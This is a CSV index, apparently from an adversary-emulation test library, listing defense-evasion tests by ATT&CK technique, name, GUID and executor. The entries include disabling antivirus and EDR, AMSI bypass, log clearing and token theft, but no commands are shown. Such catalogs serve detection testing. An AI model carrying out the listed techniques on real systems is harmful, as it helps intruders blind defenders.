defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,8,Decompile Local CHM File,20cb05e0-1fa5-406d-92c1-84da4ba01813,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
